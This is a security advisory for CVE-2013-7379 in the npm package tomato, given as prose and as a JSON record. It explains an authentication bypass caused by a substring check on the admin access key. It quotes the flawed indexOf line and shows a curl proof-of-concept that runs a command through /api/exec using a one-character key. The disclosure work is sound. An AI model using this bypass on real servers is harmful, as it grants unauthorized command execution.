GHSA-9VXC-G2JX-QJ3P

Vulnerability from github – Published: 2020-08-31 22:59 – Updated: 2021-09-23 21:00
Summary
API Admin Auth Weakness in tomato
Details

Versions of tomato prior to 0.0.6 are affected by a somewhat complex authentication bypass vulnerability in the admin service when only a single access key is configured on the server. The vulnerability allows an attacker to guess the password for the admin service, no matter how complex that password is, in less than 200 requests.

Details

The tomato API has an admin service that is enabled by setting up an access_key in the config options. This access_key is intended to protect the API admin from unauthorized access.

Tomato verifies the access_key by checking whether the server-side access_key contains the user-provided value at any position. This allows an attacker to supply a single character as the access_key: as long as the server key contains at least one instance of that character, the request is treated as authenticated.

Proof of Concept

This is the snippet of code that does the comparison to authorize requests.

if (access_key && config.master.api.access_key.indexOf(access_key) !== -1) {

For a server access_key set to anything that includes the letter 'a', the following request would be authorized.

$ curl -X POST "http://localhost:8081/api/exec" -H "Content-Type: application/json" -d @test -H "access-key: a"
{
 "cmd": "ls",
 "path": ".",
 "stdout": "app.js\nconfig.js\nlog\nnode_modules\nserver.js\n",
 "stderr": ""
}

Recommendation

Update to version 0.0.6 or later.


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.0.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "tomato"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2013-7379"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:08:49Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "Versions of `tomato` prior to 0.0.6 are affected by a somewhat complex authentication bypass vulnerability in the admin service when only a single access key is configured on the server. The vulnerability allows an attacker to guess the password for the admin service, no matter how complex that password is, in less than 200 requests.\n\n\n## Details\nThe tomato API has an admin service that is enabled by setting up an `access_key` in the config options. This `access_key` is intended to protect the API admin from unauthorized access.\n\n\nTomato verifies the `access_key` by checking to see if the server `access_key` incorporates the user provided value at any location. This allows an attacker to provide a single character as an `access_key`, and so long as the server key contains at least one instance of that character it will be considered a valid key.\n\n## Proof of Concept\nThis is the snippet of code that does the comparison to authorize requests.\n\n```\nif (access_key \u0026\u0026 config.master.api.access_key.indexOf(access_key) !== -1) {\n```\n\nFor an access_key that is set to anything that includes the letter \u0027a\u0027 the following request would be authorized.\n\n```\n$ curl -X POST \"http://localhost:8081/api/exec\" -H \"Content-Type: application/json\" -d @test -H \"access-key: a\"\n{\n \"cmd\": \"ls\",\n \"path\": \".\",\n \"stdout\": \"app.js\\nconfig.js\\nlog\\nnode_modules\\nserver.js\\n\",\n \"stderr\": \"\"\n}\n```\n\n\n\n## Recommendation\n\nUpdate to version 0.0.6 or later.",
  "id": "GHSA-9vxc-g2jx-qj3p",
  "modified": "2021-09-23T21:00:28Z",
  "published": "2020-08-31T22:59:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-7379"
    },
    {
      "type": "WEB",
      "url": "https://github.com/leizongmin/tomato/commit/9e427d524e04a905312a3294c85e939ed7d57b8c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/leizongmin/tomato"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/38"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2014/05/13/1"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2014/05/15/2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "API Admin Auth Weakness in tomato"
}